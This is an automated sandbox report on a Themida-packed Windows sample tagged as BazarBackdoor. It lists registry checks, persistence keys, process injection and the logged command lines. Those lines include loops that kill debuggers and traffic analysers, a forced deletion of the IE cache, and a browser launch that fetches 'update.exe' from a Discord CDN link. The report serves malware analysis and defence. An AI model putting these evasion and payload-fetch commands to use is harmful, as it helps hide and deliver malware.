Malware Analysis Report

2025-01-02 12:04

Sample ID 220908-ww8wmafca2
Target lxJWhxw.exe
SHA256 c1de91c5094d5821b7493dd8db39b14a2c286b3b14215b5e90e97527d1864bd7
Tags
themida bazarbackdoor backdoor evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c1de91c5094d5821b7493dd8db39b14a2c286b3b14215b5e90e97527d1864bd7

Threat Level: Known bad

The file lxJWhxw.exe was found to be: Known bad.

Malicious Activity Summary

themida bazarbackdoor backdoor evasion persistence trojan

BazarBackdoor

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Bazar/Team9 Backdoor payload

Nirsoft

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Themida packer

Checks BIOS information in registry

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: RenamesItself

Kills process with taskkill

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

NTFS ADS

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-08 18:17

Signatures

Themida packer

themida

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-08 18:17

Reported

2022-09-08 18:19

Platform

win10v2004-20220812-en

Max time kernel

93s

Max time network

97s

Command Line

"C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe"

Signatures

BazarBackdoor

backdoor bazarbackdoor

Bazar/Team9 Backdoor payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\update.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Nirsoft

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\update.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\update.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Windows\system32\certutil.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Themida packer

themida

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\update.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0f8a992d-16af-451a-8a6d-ed79b25556ad.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220908201816.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 21839.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3408 wrote to memory of 3648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4304 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1152 wrote to memory of 3124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4504 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3856 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2232 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3524 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe

"C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe" MD5

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T

C:\Windows\system32\taskkill.exe

taskkill /IM HTTPDebuggerSvc.exe /F

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc59846f8,0x7ffcc5984708,0x7ffcc5984718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3076 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

